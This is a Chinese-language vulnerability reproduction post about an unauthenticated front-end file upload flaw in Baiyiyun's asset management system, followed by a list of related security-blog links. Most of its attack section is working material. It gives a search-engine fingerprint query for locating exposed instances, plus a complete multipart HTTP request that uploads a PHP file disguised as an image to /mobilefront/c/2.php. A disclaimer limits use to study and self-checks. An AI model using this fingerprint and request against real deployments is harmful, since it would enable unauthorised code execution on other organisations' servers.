【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传

漏洞描述

湖南众合百易信息技术有限公司(简称:百易云)成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业,公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型,有效提高公司管理水平及业务办理效率、降低运营成本,公司自成立以来,已帮助众多企业实现数字化转型。资产管理运营系统/mobilefront/c/2.php前台文件上传漏洞。

资产概要

复制代码
body="media/css/uniform.default.css" && body="资管云"

漏洞复现

复制代码
POST /mobilefront/c/2.php HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 35827

-----------------------------289666258334735365651210512949
Content-Disposition: form-data; name="file1"; filename="1.php"
Content-Type: image/png

<?php phpinfo();?>
-----------------------------289666258334735365651210512949--

免责声明

本文分享的漏洞POC及相关技术仅限学习和自查用途,请勿用于非法测试或其他不当行为。传播或利用本文及相关工具所导致的任何直接或间接后果,包括法律责任和不良影响,均由使用者自行承担,文章作者概不负责。如内容涉及侵权问题,请及时联系,作者将迅速处理并致以歉意。此外,工具来源于网络,安全性需用户自行验证。感谢您的理解与支持!

相关推荐
bl4ckpe4ch3 小时前
【漏洞复现】CVE-2024-38856(ApacheOfbiz RCE)
网络安全·漏洞复现
游戏开发爱好者89 小时前
iOS15描述文件在哪下载?iOS15测试版描述文件下载与升级教程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
学习溢出9 小时前
【网络安全】OWASP 十大漏洞
网络·安全·web安全·网络安全
半升酒10 小时前
Day-1 漏洞攻击实战
安全·网络安全
浩浩测试一下11 小时前
信息收集之hack用的网络空间搜索引擎
android·网络·安全·web安全·搜索引擎·网络安全·安全架构
pencek12 小时前
XCTF-web(五)
网络安全
火绒终端安全管理系统12 小时前
教育行业网络安全:守护学校终端安全,筑牢教育行业网络安全防线!
网络·安全·web安全·网络安全·火绒安全
NPE~12 小时前
[渗透测试]渗透测试靶场docker搭建 — —全集
网络安全·docker·容器·渗透测试·渗透靶场
go_to_hacker14 小时前
安恒Web安全面试题
网络安全
CoderJia程序员甲17 小时前
系统分析师知识点:访问控制模型OBAC、RBAC、TBAC与ABAC的对比与应用
网络安全·访问控制·技术选型·系统分析师